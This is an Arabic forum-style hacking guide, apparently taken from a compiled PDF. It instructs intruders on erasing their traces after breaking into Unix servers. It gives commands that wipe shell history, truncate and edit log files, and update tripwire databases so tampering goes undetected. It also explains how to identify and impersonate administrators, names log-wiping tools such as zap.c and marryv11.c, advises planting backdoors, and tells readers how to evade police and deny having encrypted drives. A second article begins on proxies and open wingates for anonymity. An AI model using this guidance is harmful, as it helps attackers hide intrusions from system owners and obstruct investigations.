                                                         ‫و في بعض النسخ القديمه$‪home/.lastlog‬‬

                                                                                     ‫ال تترك اثرا :‬
                                                                                      ‫=======‬
‫كثيير من الهاكرز ينجحون في عملية حذف دخولهم من ملفات اللوق .. لكنهم ينسون امرا هاما و قاتال !!! و‬
                                                                          ‫هي الملفات التي توجد هنا‬
                                                                           ‫‪/tmp and $HOME‬‬
                                         ‫و جود ال ‪ Shell History‬في $‪ HOME‬مصدر قلق كبيير :‬
                                                                                ‫: ‪History files‬‬
                                                                             ‫‪sh : .sh_history‬‬
                                                                                ‫‪csh : .history‬‬
                                                                            ‫‪ksh : .sh_history‬‬
                                                                       ‫‪bash: .bash_history‬‬
                                                                                ‫‪zsh : .history‬‬
                                                                               ‫: ‪Backup Files‬‬
                                                                       ‫~* ,‪dead.letter, *.bak‬‬
                                                     ‫لكن الحل موجود ايضا لمسح ال : ‪History files‬‬
                                                                          ‫1.‪mv .logout save‬‬


                                                  ‫29‬
                                                             ‫‪echo rm -rf .history>.logout‬‬
                                                            ‫‪echo rm -rf .logout>>.logout‬‬
                                                        ‫‪echo mv save.1 .logout>>.logout‬‬

                                                              ‫-امور و اشياء يجب تجنبها و الحظر منها‬
                                                                 ‫======================‬
    ‫التقوم ابدا بكسر اي باسورد اال على ‪ encrypted partition‬كما عليك دائما انت تحذر من استخدام‬
                                                         ‫اشتراكاتك ( اشتراك الجامعه على سبيل المثال )‬
‫النه بمنتهى البساطه يمكن ان يرى ماتفعله مدير الشبكه ‪ admin‬و من ثم سيعرف مالذي تقوم به و الملفات‬
                                                                                  ‫التي تستخدمها الخ ..‬
 ‫حاول دائما ان تغيير اسامي البرامج المشبوهه لديك يعني احنا العرب خصوصا غاويين نسمي اسماء اسامي‬
                                                                                 ‫مخيفه على الفاضي ..‬
    ‫التفكر في نفسك فقط .. يعني حين ان تستخدم بعض االشتراكات او ال ‪shells‬التي تسمح بالعمل الخلفي‬
                  ‫‪background‬البد ان تعرف انك تبطئ من سرعة السيرفر و بالتالي تلفت االنظار !!!‬
 ‫حاول ان التستخدم ‪ parametres‬على قدر المستطاع ... على سبيل المثال اذا اردت ان تتصل من الشيل‬
  ‫على تيلنت لموقع معين او سيرفر معين التقوم بعمل االتي 32 /‪: telnet http://www.host.com‬‬
                                                                 ‫انما ببساطه اتبع الخطوات البطيئه و هي‬
                                                                                               ‫‪telnet‬‬
                                                                                                ‫‪open‬‬
                                                                        ‫/‪http://www.host.com‬‬
                                                                                              ‫و هكذا ..‬
‫في حالة انك اخترقت سيرفر معين من االفضل ان تضع عليه ‪ backdoors‬مخصصه لنظام التشغيل ( مش‬
                                     ‫7‪sub‬هههههههههه ) و هي كثييره و موجوده مجانا على االنترنت‬

                                                ‫الجزء الرابع : التقنيات الحديثه الي يتي يجب مالحظتها‬
                                              ‫===============================‬
                                                                                             ‫-تمهيد‬
                                                                                            ‫*******‬
  ‫بعد ان ثبت اول ‪ sniffer‬و خططت لبدا االختراقات .. عليك ان تعرف كيف تستخدم هذه التقنيات متعبا ما‬
                                                                                               ‫يلي :‬
                                                                       ‫-امنع تقفى اثرك من اي نوع‬
                                                                         ‫**********************‬
 ‫قد يالحظ االدمين ( مدير الشبكه ) وجودك كمخترق ‪ hacker‬و انك اطحت باحد المواقع لكن هذا اليهم ...‬
                                     ‫المهم هو انه كيف سيرصدك و عندها كيف يمكن ان يتعامل معك !!!‬
‫لذا ففي هذا الجزء سيتم توضيح كل االحتماالت و االساليب الذي يمكن بها تتبعك و رصدك و ايضا كيف يمكن‬
                                                                                       ‫ان تمنعها ...‬

  ‫*من الطبيعي ( العادي ) ان يسهل على مدير الشكبه ( ) ‪ admin‬معرفة النظام الذي كان المخترق عليه‬
 ‫عند دخوله على شبكته و ذلك اما عن طريق ملفات اللوق ( هذا ان كان الهاكر غبي لتركها كما هي ) او من‬
                                                                      ‫ال ‪ output‬من ال ‪sniffer‬‬
                                  ‫او من اوامر ‪ netstat‬في حالة ان المخترق مازال موجودا ‪online‬‬
                                                      ‫من اجل هذا تختاج ال !! ‪GateWay Server‬‬

     ‫‪* A gateway server in between‬هذا واحد من الكثيير من السيرفرات التي يوجد لك حساب‬
 ‫عليها و التي تعتبر في منتهى السخافه في االستخدام و انت تحتاج الن تكون رووت عليها لتستطيع تغيير ال‬
                                                                        ‫‪wtmp and lastlogs‬‬
   ‫كما انه البد ان من استخدام اكثر من ‪ gateway server‬و ان تبدل بينهم باستمرار حتى ال يتم الكشف‬
                                                                                            ‫عنك ..‬
     ‫من الشيل الذي ستخترق منه .. قم باالتصال بال ‪ gateway server‬و من ثم تتصل بالسيرفر المراد‬
                                                                                        ‫اختراقه ..‬


                                                 ‫39‬
                                              ‫( >==تحتاج دائما ل ‪ root access‬لتغيير اللوق )‬
    ‫باستخدامك ل ‪ Dialup server‬يجنبك الكثيير من المشاكل .. حيث انك في غنى عن التعديل في ملفات‬
           ‫اللوق بشرط ان تدخل باشتراك مختلف في كل مره تدخل فيها على ال )= ‪hacked system‬‬
       ‫ملحوظه : اذا كنت قادر على االتصال بسرفيرات ‪ dialup‬كثييره فال حاجه الن تستخدم ‪hacking‬‬
                             ‫‪server‬النه سيتغير اثرك بتغير الشركات المختلفه التي تتصل من خاللها‬

  ‫بالنسبه للمتواجدين في الواليات المتحده االمريكيه و اوروبا ( الدول المتقدمه ) حتى و ان قمت بما سبق (‬
            ‫) ‪dialup servers‬يمكنهم تسجيل كل اتصال تم و لديهم ارشيفات منذ سنيين هذا عددها !‬

                                     ‫نتيجه و اختصار للنقطه السابقه موضحه بالرسم في الصوره التاليه :‬




                                ‫-ايجاد اي نوع من انواع ملفات اللوق ‪ lOGs‬مهما كان فيها من تالعب..‬
                                            ‫**************************************************‬

                                                                                                   ‫***‬
   ‫من الهام و الضروري جدا ان تعثر على كل ملفات اللوق حتى المخفي منها .. للحصول و العثور على هذه‬
                                                                    ‫الملفات يمكن ذلك بهاتين الطريقتين :‬
‫- 1اعثر على جميع الملفات المفتوحه : و يمكنك ذلك باستخدام برنامج ‪ LSOF‬هو اختصار ‪List Open‬‬
                                                      ‫‪Files‬و من ثم يمكن العثور عليهم و التعديل فيهم‬
                               ‫- 2ابحث عن كل الملفات التي تغيرت ( حدث فيها تغيير ) من بعد دخولك -‬
   ‫بعد دخولك قم بعمل ‪ touch /tmp/check‬و بعدها قم "‪"find / -newer /tmp/check -print‬‬
                  ‫العمليه التي سنقوم بها ستاذخ الشكل التالي : بحث - >نتائج - >مطالعة النتائج - >تعديل‬
         ‫قم ايضا بالتشيك على اماكن ال ‪ log files‬االعتياديه /‪ usr/adm‬و /‪ var/adm‬و /‪var/log‬‬
‫اذا يتم تسجيل العمليات في ال ‪ loghost‬يعني ‪ xx@loghost‬فانت هنا في مازق .. حيث انه البد من ان‬
                                                               ‫تخترق ال ‪ loghost‬لتعدل ملفات اللوق‬
  ‫يمكن تعديل اللوق ‪ logfiles‬بعدة طرق ابسطها باستخدام اي محرر كتابه ‪ text editor‬او قم بعد اسطر‬
‫الملف باستخدام ‪ wc‬و من ثم حذف اخر 22 اسطر من خالل "01‪: "head -LineNumbersMinus‬‬
                                                    ‫بالعربي ( عدد السطور مطروحا 22 منه ) ‪- head‬‬
       ‫اذا كان برنامج ‪ accouting‬مثبت على السيرفر يمكنك ببساطه استخدام ‪acct-cleaner from‬‬
                                                                             ‫‪zhart‬و هو هيعمل الالزم‬

‫اذا كان النظام يستخدم ‪ wtmpx‬و ‪ utmpx‬ايضا فمع االسف عزيز انت في ورطه !!! فانا على اعرف اي‬
‫برنامج للتعامل في هذه الحاله .. لو استطعت ان تبرمج واحد ( لالخوه المبرمجين ) ال تنسى ان تعلنا به =)‬

                                            ‫-تحقق من‪syslog configuration and logfile‬‬
                                                       ‫************************************‬
        ‫تعتمد معظم البرامج على ال ‪ syslog function‬لتسجيل اي شئ يريدونه .. فعليك ان تتحقق من‬


                                                 ‫49‬
                                                                          ‫خصائص ال ‪syslog‬‬
‫فاذا كانت اللوقات ‪ logs‬التخزن فقط على الجهاز انما على ‪ hosts‬اخرى ... فيؤسفني انك البد من اختراق‬
                                                                                  ‫هذه‪hosts‬‬
                                               ‫ملف ال ‪ syslog‬موجود في/‪etc/syslog.conf‬‬

                                                                   ‫-تحقق من نوعيات برامج االمن المثبته‬
                                                                      ‫******************************‬
      ‫توجد العديد من برامج الفحص األمني غالبا على المواقع ذات الحس األمني العالي. وتدار هذة البرامج‬
‫بواسطه أداه تسمى ‪ cron‬و يكون مكانها األفتراضي أو الطبيعي هو /‪ var/spool/cron/crontabs‬و‬
‫هي تقوم بمتابعه جميع المدخالت . خاصه الـ ‪Root‬و الملفات التي يستعملها. للتحقق اللسريع من الموضوع‬
                                                                                       ‫نستخدم األمر التالي‬
                                                                                  ‫."‪"crontab -l root‬‬
  ‫غالبا ماتكون هذه األدوات محمله و عامله على حساب المدير. و يكون بعضها في مجلد الـ ~/‪ bin‬الخاص‬
                          ‫به. كما يمكن ان يكون هناك ‪ sinnefer‬موضوع ألغراض امنيه في نفس المكان.‬
                                                  ‫من األدوات الت تستعمل في مثل هذه الفحوصات الداخليه‬
                                                                   ‫,5‪tiger, cops, spi, tripwire, l‬‬
                                                                   ‫.‪binaudit, hobgoblin, s3 etc‬‬
    ‫ينبغي على المقتحم أن يتأكد من وجود هذه األدوات و التأكد من التقارير التي ترسلها , للتأكد من أنها ال‬
                                                                                     ‫تكشف عمليه األقتحام‬
   ‫يمكنك تعديل مفات هذه البرامج للتأكد من أنها لن تقوم باألبالغ عن األقتحام, و يمكن تنفيذ ذلك بطريقتين:‬
  ‫-قم بتعديل البرنامج برمجيا لكي ال يقوم باألبالغ عنك (واسعه شويه دي) أو قم بأزالته و أستعمل برنامجا‬
                                                                                                      ‫مزيفا‬
                     ‫-قد تضطر إلى أزاله الـ ‪ back door‬الذي أستعملته و محاوله تحميله بطريقه أخرى‬
                                                                      ‫-تحقق من وجود المدراء‪Admins‬‬
                                                                         ‫****************************‬
         ‫من المهم أن تجد جميع المدراء على الموقع, و تحاول معرفه الحسابات العاديه التي يتم أستخدامها.‬
                                                                    ‫توجد عده طرق لكشف هذه المعلومات:‬
                                                       ‫-قم بفحص الملف ‪ .forword‬و مدخالت الـ‪alias‬‬
                 ‫-أفحص ملف الـ ‪ sulog‬و حدد المستخدمين الذين نجحو في تنفيذ األمر ‪ su root‬بنجا ح‬
      ‫-أسحب ملف الـ ‪ group‬و أبحث عن جميع المجموعات التي لها عالقه باألداره ,‪( admin, root‬‬
                                                                                            ‫‪wheel, etc‬‬
                                         ‫-أسحب ملف ‪ passwd‬بالنسبه للمدير لعرض كلمات سر المدراء‬

 ‫يعد كل هذا , يمكنك معرفه كل المدراء على الموقع. أدخل إلى مجلداتهم الخاصه ( في حاله عدم أستطاعتك ,‬
   ‫أستخدم أحدى األدوات التاليه ‪ chid.c, changeid.c‬ألنتحال شخصيه المستخدم) . و أفحص الملفات‬
‫التاليه ‪history/.sh_history/.bash_history‬لمعرفه األوامر التي يستعملونها عادة, قد يفيدك هذا‬
                          ‫في معرفه دور المدير على الموقع, أو أكتشاف معلومات مخفيه. قم بفحص ملفات‬
‫‪.profile/.login/.bash_profile‬لمراجعه أعدادات الـ ‪alias‬التي تستخدم, و إذا ماكانت أدوات أمنيه‬
 ‫خفيه مستخدمه. و من الطبيعي طبعا أن تقوم بفحص كافه الملفات و المجلدات , خاصه المخفيه منها قد تجد‬
                                                                           ‫بعض األشياء المفيده حقا‬


                                                           ‫‪checksum checking software‬‬
                                                                       ‫************************‬
       ‫ُ‬                                                    ‫ُ‬
 ‫برامج ( ‪ checksum‬هو قيمة رقمية تستعمل للتأكد من خلو البيانات من األخطاء. هذه القيمة تحسب من‬
                                                                           ‫خالل عملية كشف الجمع)‬

    ‫بعض المدراء ويقمون باستعمال برامج للتحقق من حدوث اي تغييرات في الملفات، وفي حالة حدوث اي‬
                                                     ‫تغير، يقوم بفحص الملفات ويستطيع اكتشافها‬
‫فكيف تعرف مااذا استخدمت هناك برامج التحقق واي االنواع استخدمت؟ واذاعرفت فكيف تعدلها بحيث تخدم‬


                                                   ‫59‬
                                                                                        ‫من اجلك ؟‬
  ‫هناك انواع عديدة من برامج التحقق ومن السهل كتابة واحدة منها بنفسك ولكن من الصعب اكتشاف ما اذا‬
                                                     ‫استخدمت مثل تلك البرامج علي الملفات للحماية‬
                                   ‫هذه اسماء بعض البرامج التي تقوم ب عملية فحص‪checksum‬‬
                       ‫‪SOFTWARE : STANDARD PATH : BINARY FILENAMES‬‬
     ‫‪tripwire : /usr/adm/tcheck, /usr/local/adm/tcheck : databases, tripwire‬‬
                                        ‫‪binaudit : /usr/local/adm/audit : auditscan‬‬
                                                   ‫‪hobgoblin : ~user/bin : hobgoblin‬‬
                                                            ‫‪raudit : ~user/bin : raudit.pl‬‬
                                                               ‫5‪l5 : compile directory : l‬‬

     ‫كما تري هناك احتماالت كثيرة، ربما البرنامج نفسه او قواعد البيانات يوجد علي جزء آخر، مثل جزء‬
‫‪NTFS‬لمضيف او جهاز آخر ، او حتي قواعد بيانات التي تحمل معلومات ‪ checksum‬في جهاز محمي‬
                                                                    ‫علي الكتابة ( اقراص ‪ CD‬مثال ) ...‬
  ‫ولكن يمكنك القيام بعملية فحص استطالعي سريع لمعرفة البرامج المستخدمة ، واذا لم تستخدم ففرصتك،‬
  ‫واذا لم تجد شي ولكنك كنت متاكدا من استخدامهم لتلك االنواع من البرامج هذا يعني ان الموقع او المزود‬
                                        ‫محمي بشكل جيدا ( هارد لك ) ويجب ان ال تعبث بالملفات ابدا ..‬

                               ‫ولكن ماالعمل اذا اكتشفت انهم يستخدمون تلك البرامج وبامكانك تغييرها؟؟‬
 ‫يمكنك 2 - ايهام تلك البرنامج بطرق شرعي بانه تم تغيير ملف ما بشكل قانوني ويتم تحديث قواعد البيانات‬
                                                        ‫مثال."‪"tripwire -update /bin/target‬‬

  ‫- 2يمكنك تغيير قائمة الملفات التي يجب فحصها وتزيل اسم الملفات المراد من القائمة فال يتم فحصها مرة‬
   ‫اخري للتحقق ( ولكن يجب ان تتاكد ايضا ان ملف قواعد البيانات نفسها ال يتم فحصها ب ‪checksum‬‬
                                                           ‫حتي ال يتم اكتشاف التغييرات التي قمت بها )‬


                                                                         ‫-حيل المستخدم االمنيه‬
                                                                         ‫*******************‬
   ‫هذه الحيل ما ندر توجد او تستخدم لكنني كتبتها فقط الكون شملت كل شئ ( لكمال الموضوع ) .. فبعض‬
  ‫المستخدمين يسمون اشتراكاتهم ‪ admins‬و بالطبع ال يريدون ان يعبث في ملفاتهم اي شخص فيقومون‬
 ‫بعمل بعض الحيل في ملفات ال ‪ startup‬لذا فدائما تحقق من ‪.profile, .cshrc, .login, .logout‬‬
                                                              ‫الخ ( اي الملفات التي تبدا بنقطه )‬



                                                                             ‫الجزء الخامس :‬
                                                                             ‫=========‬
                                                             ‫ماذا تفعل ان وضعت تحت المراقبه؟‬
                                                                ‫***************************‬
 ‫متى اصحبت تحت الميكروسكوب ( المراقبه ) من قبل الشرطه او حتى ال ‪administrators‬عليك القيام‬
                            ‫بخطوات هامه و سريعه حتى اليستطيعو االمساك بدليل ( برهان ) عليك‬

   ‫-ملحوظه : ان كان في اعتقاد ال ‪ administrators‬انك ‪ hacker‬فانت == >مذنب حتى تثبت براته‬
                                                                                                   ‫...‬
        ‫اليعني القانون اي شئ لل ( ‪ admins‬بعض االوقات اعتقد انه ال يوجد فرق بين ال ‪ hacker‬و ال‬
‫‪administrator‬اال بان مالك الكومبيوتر هو ال ‪ administrator‬فقط ) عندما يعتقدون انك هاكر فانك‬
         ‫فورا اصبحت مذنب .. سيقومو مباشرة بمراقبة بريدك اللكتروني و ملفاتك و ان كان محترف االدمين‬
                                                                     ‫سيرصدك ايضا هجماتك االخرى ..‬
                       ‫اذا كان يمكنهم مراقبة كل هذه االتصاالت اكيد ببساطه يمكنهم مراقبة خط تيليفونك ..‬


                                                 ‫69‬
      ‫لذا فعليك عدم القيام باي اتصاالت فيها اخبار اخترقاتك .. و ان حتى اردت ان تحذر اصحابك فال تخبرهم‬
       ‫هاتفيا او ببريد الكتروني ( اال اذا كان مشفرا) و من االفضل ان تخبرهم عندما تقابلهم وجها لوجه .. و‬
                                                            ‫تمنعهم من راسال اي رسائل غيير عاديه ..‬
‫لتؤمن نفسك عليك ان تبقى على هذا الحال على االقل من شهر الى شهرين .. و اال ستواجه مشاكل اعتقد انك‬
                                                                                           ‫الترغب بها‬

                                                                                      ‫الجزء السادس :‬
                                                                                      ‫=========‬
                   ‫ما الذي عليك القيام به و ايضا الذي البد من عدم القيام به في حالة انه تم القبض عليك:‬
                                           ‫**************************************************‬

                                                                                    ‫**************‬
‫اوال : اطلب محاميك فورا !!!! : ال تحاول بان تتذكى انت و ترد على التحقيق بمفردك .. فاطلب محاميك كي‬
       ‫يدافع عنك هو و يطلعك على ما يجب ان تذكره و ما يجب ان ال تذكره نهائيا .. بعدها غالبا ما سيطلب‬
   ‫المحامي جهازك ( الكومبيوتر ) باقصى سرعه بحجة احتياجه في العمل و اال عليهم تحميل جميع االعباء‬
‫الماديه و المشاكل التي قد تحدث عن عدك استخدام الجهاز .. لذا فانه من العملي جدا ان يكون عندك محامي‬
                         ‫جاهز في اي وقت قبل ان تقع الفاس في الراس و بعدها تبدا في البحث و التدوير‬
‫ثانيا : ابدا ال تتكلم اال الشرطه !!! : التعطي للشرطه اي معلومات عنك او عن زمالئك بحجة ان هذا سيخفف‬
‫العقاب عنك و سيخرجك من المازق .. الن هذا لن يفيدك بل سيدينك اكثر .. و ان كان يجب استجوابك فاطلب‬
                                          ‫ان يتم هذا فقط من خالل محاميك ( و هذا ايضا حق من حقوقك )‬
   ‫التخبر ابدا عن اصدقاؤك ليس ققط كنوع من الشهامه .. انما ايضا بدخول اصحابك في الموضوع ستتسع‬
                                 ‫دائرة الموضوع و من ثم تزيد المعلومات عنك و عن جرائمك و هم ايضا!‬
 ‫بعض الدول من ضمن قانونها انه اذا لم تستطع الشرطه فك تشفير ملفاتك او جزء من الهارد ديسك فيمكنك‬
                                                                     ‫بمنتهى الحريه عدم االفصا ح عنها‬
‫لكن بعض الدول االخرى في قانونها انه مادامت وقعت في المصيده البد ان تدلي لهم بكل شئ في هذه الحاله‬
                                      ‫انصحك باستشارة محاميك و انكار انك لديك اي اقراص صلبه مشفره‬

                                                                                    ‫الجزء السابع:‬
                                                                                   ‫========‬
                                                           ‫قائمه بافضل البرامج للتخفي و االختباء:‬
                                                              ‫******************************‬
                  ‫‪Change - Changes fields of the logfile to anything you want‬‬
                                ‫‪Delete - Deletes, cuts out the entries you want‬‬
                                                      ‫‪Edit - real Editor for the logfile‬‬
                 ‫.‪Overwrite - just Overwrites the entries with zero-value bytes‬‬
                      ‫!‪Don't use such software (f.e. zap) - it can be detected‬‬
                                  ‫---------------------------------------------------------------‬
                                                                           ‫‪LOG MODIFIER‬‬
                                                                                ‫++++++++++‬

                ‫‪ah-1_0b.tar Changes the entries of accounting information‬‬
                   ‫‪clear.c Deletes entries in utmp, wtmp, lastlog and wtmpx‬‬
                    ‫‪cloak2.c Changes the entries in utmp, wtmp and lastlog‬‬
‫‪invisible.c Overwrites utmp, wtmp and lastlog with predefines values, so‬‬
                ‫! ‪it's better than zap. Watch out, there are numerous inv*.c‬‬
         ‫!‪marryv11.c Edit utmp, wtmp, lastlog and accounting data - best‬‬
                                                       ‫‪wzap.c Deletes entries in wtmp‬‬
                                                   ‫‪wtmped.c Deletes entries in wtmp‬‬
      ‫!‪zap.c Overwrites utmp, wtmp, lastlog - Don't use! Can be detected‬‬
             ‫--------------------------------------------------------------------------------------‬


                                                 ‫79‬
                                                                          ‫الجزء الثامن :‬
                                                                        ‫=========‬
                                                                            ‫كلمه ختاميه‬
                                                                            ‫**********‬
       ‫التدعهم ابدا يقبضون عليك .. دائما اجعل عيناك مفتوحان .. اعرف في من تثق و من ال !!‬
                                       ‫التفكر في نفسك فقط (انما ايضا تذكر كل من حولك )‬
                                                    ‫تمنياتي للجميع بحياة ممتعه و امنه ..‬

                                   ‫انتهى،،،‬




‫" كيف تبقى مجهول الهوية في النت (الجزء األول)؟؟ "‬

                                                              ‫<منقول من منتدى إعصار>‬

                                                                       ‫<الكاتب: المدمر>‬

                                                     ‫في هذا الموضوع سوف أقوم بتعليمكم‬
                                                                                ‫ماهو؟‬


                                     ‫89‬
                                                          ‫‪Proxy - Sock Host - Wingate‬‬
                                    ‫(-وكيفية استخدامهم للزيادة من صعوبة الكشف عن هويتك في النت)-‬
                                                         ‫مع أدوات بسيطة أيضا تساعدك في التخفي‬

                                           ‫++++++++++++++++++++++++++++++++++‬

                                                              ‫‪Introduction to Proxy Server‬‬
                                                     ‫(=الدخول إلى ‪ proxy server‬أي:خادم الوكيل)=‬
  ‫( ‪proxy server‬خادم الوكيل) هو خادم ‪ server‬ليقوم أحدا ما بتنزيله على نظامه لإلتصال مع المواقع‬
                        ‫أو أي جهاز على اإلنترنت مايفعله أوال هو االتصال بخادم الوكيل ‪proxy server‬‬
                                                       ‫لكنه غير إجباري لكن غالبا مايستخدم في الشبكات‬
                                                                                          ‫مثل‪:LAN‬‬
                                                                         ‫‪Local Area Network‬‬
     ‫شبكة إنترنت محلية عند اتصالك باإلنترنت خالل ‪ proxy server‬جميع اتصاالتك سوف تذهب إلى هذا‬
          ‫البروكسي المستخدم أوال وقبل كل شيء ثم تتوزع على األجهزة التي تريد أن تعمل إتصال بها كمثال‬
       ‫إذا أردت أن تتصل باإلنترنت من خالل استخدام ‪ proxy server‬وتريد أن تتصفح وتفتح موقعا كهذا‬
                                                                       ‫/‪http://hackergurus.tk‬‬
                     ‫عليك أوال بالطلب من هذا ‪ proxy server‬ثم يقوم ‪ proxy server‬بطلب الصفحة‬
                                                                       ‫/‪http://hackergurus.tk‬‬
     ‫إلى الخادم ‪ server‬الموقع ومن ثم تحميلها وتخزينها في حسابها بعد ذلك سوف تمدك وتعطيك الصفحة‬
                                                                                     ‫أي:تستعرضها...‬
  ‫أليست هذه العملية تأخذ ‪ bit‬بسيط في وقت أطول مقارنة باإلتصال المباشر (العادي) الذي يكلفك فقط بطلب‬
                                     ‫الصفحة من خادم الموقع ومن ثم جاري تحميلها بسهولة واستعراضها‬
 ‫لكن مع استعمالك للبروكسي سيرفر سوف يصبح اتصالك باإلنترنت بطيء مقارنة مع االتصال المباشر وذلك‬
   ‫ألن كل صفحة تقوم بتحميلها أي تستعرضها تذهب إلى خادم البروكسي أي ‪ proxey server‬وهذا يثقل‬
                                                                                        ‫عملية التصفح‬
                                              ‫وهناك حالة وحدة وقد تصبح ‪ lucky‬بعض األحيان قل كيف‬
         ‫إذا الشخص قام باستخدام نفس البروكسي واستعرض نفس الصفحات وانت استخدمت البروكسي الي‬
               ‫استخدمه هذا الشخص واستعرضت الصفحة الي استعرضها را ح يصبح البروكسي سريع ليه؟!‬
‫ألن الشخص األول الي قام باستخدام البروكسي وعرض الصفحات الصفحة حملت إلى ‪ proxy server‬فما‬
            ‫بالك إذا كان لديك نفس البروكسي وحبيت تسعرض نفس الصفحة سوف يكون سريع ألن الصفحة‬
                                                                       ‫‪download‬جاهزة فهمت#..‬
‫وأيضا ياأخواني الوقت مهم مثال اذا الواحد استعرض صفحة ببروكسي من قبل 22 أيام وانت استخدمت نفس‬
‫البروكسي واسعرضت نفس الصفحة غير اذا عرضها في يومين ألن ‪ proxy server‬يقدم المواقع الحديثة‬
        ‫على القديمة علشان كذا أحيانا تالحظ تأخر في البروكسيات كل ماعليك عمل ‪ Refresh‬أو‪Reload‬‬

                                                                    ‫‪Why use a Proxy Server‬‬
                                                                  ‫(=لماذا نستمعل البروكسي سيرفر؟)=‬
    ‫وانا را ح اجاوب على األخوان الي يسئلوني مادام خادم البروكسي يقوم بعملية إبطاء التحميل والتقليل من‬
                                                                     ‫السرعة إذا مالدافع الستخدامه ؟!!!‬
                                                                  ‫الجواب:هو أن مزودين خدمة اإلنترنت‬
                                                                                                  ‫‪ISP‬‬
                                                                   ‫‪Internet Service Provider‬‬
    ‫يقومون بالتحديد وبوضعك في قفص وهو عدم السما ح الستعراض وتحميل الصفحات إال التي تم الموافقة‬
  ‫عليها من قبل مزود الخدمة ويقومون بتقليل المواقع للحفاظ على ‪ Traffic‬الخاص بهم لتوفير السرعة في‬
                                                                         ‫استخدام البروكسي لمشتركينهم‬
         ‫أما ‪ proxy server‬سوف يجعل لك الحرية الكاملة في استعراض أي موقع مهما كان وسبب آخر‬
     ‫للبروكسي وهو للحفاظ أو للزيادة من بقائك مجهوال أثناء قيامك بأي عملية من عمليات االتصال يعني لو‬
 ‫استخدمت بروكسي را ح يصعب على خادم الموقع اصطيادك وذلك ألنه يأخذ ‪ ip‬الذي اتصل الموقع من خالله‬
                                                     ‫وهو ‪ ip‬البروكسي وهو الذي يتصل مع خادم الموقع‬


                                                 ‫99‬
‫وأيضا تستطيع الزيادة من صعوبة محاولة االسقاط بك وذلك باستخدام عدة بروكسيات ذات منافذ مختلفة لكن‬
                                ‫أعلم أن هذا سوف يقوم بتقليل من سرعة االتصال لذلك حاول ان تستخدم‬
   ‫‪proxy‬و ‪ port‬قريبين إلى منطقتك التي تعيش فيها حتى يكون ‪ proxy server‬قريب وبذلك سوف‬
         ‫تزداد السرعة وأحيانا تفوق سرعة البروكسي سرعة بروكسي الخاص بمزود الخدمة مارأيك!! ..)‬
     ‫تحذير للجميع إياكم ياأخوان أن تنخدعوا ببروكسيات مايكروسوفت مهما وضع لها من إعالن كأن يقول‬
                                                                                           ‫استخدم‬
                                                              ‫‪cach.microsoft.com‬بمنفذ08‬
                                                   ‫وطبعا انت ماتصدق تالقي بروكسي بهذي المميزات‬
                                                                                 ‫-1سريع التصفح‬
                                                                             ‫-2يفتح جميع المواقع‬
                                                                        ‫-3التحميل عالي جدا وقوي‬
                                                                                  ‫هل تعرف لماذا ؟‬
                                  ‫ألن أكثر المستخدمين حول العالم هذا البروكسي سيرفر وهذا خطير جدا‬
                    ‫الن هذا البروكسي سيرفر سوف يقوم بمعرفة جميع تحركاتك وحفظها في ملفات‪Logs‬‬

                                                                       ‫‪Introduction to Wingate‬‬
                                                                  ‫(=الدخول أو اإلدخال إلى=)‪Wingate‬‬
                                                         ‫كثيرا مانسمع عنه لكن هل نعرف معناه الحقيقي ؟‬
                                                                                    ‫ماهو ‪ WinGate‬؟‬
     ‫هو ‪ proxy server firewall‬أي يفوق البروكسي وهو خادم بروكسي ذو حاجز ناري يحتوي على‬
     ‫حزمة كبيرة وضخمة من البرامج المختصة بالحماية والتي تبقيك( ‪ Anonymously‬مجهول الهوية)‬
              ‫التي تقوم بالسما ح بالمشاركة بفرد واحد أو بعدة من اتصاالت اإلنترنت بشركة كمبيوتر بالكامل‬
                               ‫اتصال اإلنترنت يكون مشارك بواسطة ‪ WinGate‬تقريبا لعدة أنواع تشمل:‬
             ‫-------------------------------------------------------------------------------------------‬
 ‫‪dial up modem, ISDN, xDSL, cable modem, satellite connection, or even‬‬
                                                                          ‫‪dedicated T1 circuits‬‬
             ‫-------------------------------------------------------------------------------------------‬
                                                                                            ‫‪wingate‬‬
   ‫متشابه مع البروكسي سيرفر حيث يعمل اتصاالت مع كومبيوتر لسيرفر آخر خالل المنفذ , 32 في الحقيقة‬
                                                                                    ‫هو اتصال. ‪Telnet‬‬
 ‫‪the wingate‬سوف يجعل أي شخص على الشبكة دخول اإلنترنت أو االتصال به لمواقع أخرى . بصورة‬
                                        ‫سيئة وفق بين ‪ wingate‬وعدم كفاءة( ‪ Aminstrator‬المدير)‬
       ‫وهنالك العديد من ‪ wingate‬والذي تجعل األشخاص على اإلنترنت لإلتصال ببعضهم , بدال من تحديد‬
                                                 ‫المدخل للناس من( ‪ Local Network‬الشبكة المحلية)‬
                        ‫وفتح الطريق ألي شيئ من ‪ ipspoof‬في ‪ ICQ - Mirc‬إلى سوء استغالل الحجم.‬
‫مثال ‪ wingate‬قد يطلق عليه ‪ open wingates‬وعادة تنتهي مدتها في بضعة أيام أو شهور حتى يقوم‬
    ‫باكتشافه( ‪ Admin‬المدير) وهذا را ح يكون ‪ DIScover‬ياأخواني يعني مكشوف أو يتلقى شكاوي من‬
                                                                    ‫سوء استخدام أو أعضاء غامضين !!!‬
  ‫الفائدة الوحيدة للمديرين هي القدرة على وضع مستخدمين متعددين في نفس االتصال لكن ياأخوان المشاكل‬
                                                                                            ‫تفوق الفوائد‬
  ‫إذا أي شخص قام بتنزيل ‪ WinGate‬خاص به عليه الحذر بشدة ومعرفة ماهو يفعل ويتأكد من أنه موفق‬
                             ‫بشكل آمن وهنالك أخرى متعددة أكثر ‪ WinGate‬أمانا مثل برامج ‪SyGate‬‬
   ‫في معظم الحاالت ملفات( ‪ Logs‬سجالت) الخاصة بالـ ‪WinGate Server‬تحذف عادة بعد 0. ساعة‬
                                                                ‫لألعمال وأيضا للـ( ‪ISP's‬خاصة بالكبار)‬
                                      ‫أي اليوجد حاجة أو موارد لتدوين كل شيء يصادف خادم ‪wingate‬‬

                                                                ‫‪How do I find Wingates‬‬
                                                       ‫(=كيف يمكنني الحصول على‪ WinGate‬؟)=‬
‫أفضل طريقة للحصول على هذا الشيء هو كلمة بالفم . بإمكانك تاخذ عنوان ‪ wingate‬من أصدقائك إذا كان‬
                                                ‫أحد عنده . الشيء الثاني أقتر ح عليك تستخدم برامج‬


                                                 ‫001‬
                                                                       ‫‪WinGate Scanner‬‬
                                                  ‫هنالك العديد منها بالنت ابحث فقط في ‪google‬‬
                                                               ‫/‪http://www.google.com‬‬
                            ‫كل ماعليك فعله هو وضع مدى ‪ ip‬او ‪ hostname‬ومن ثم البدء بالبحث‬
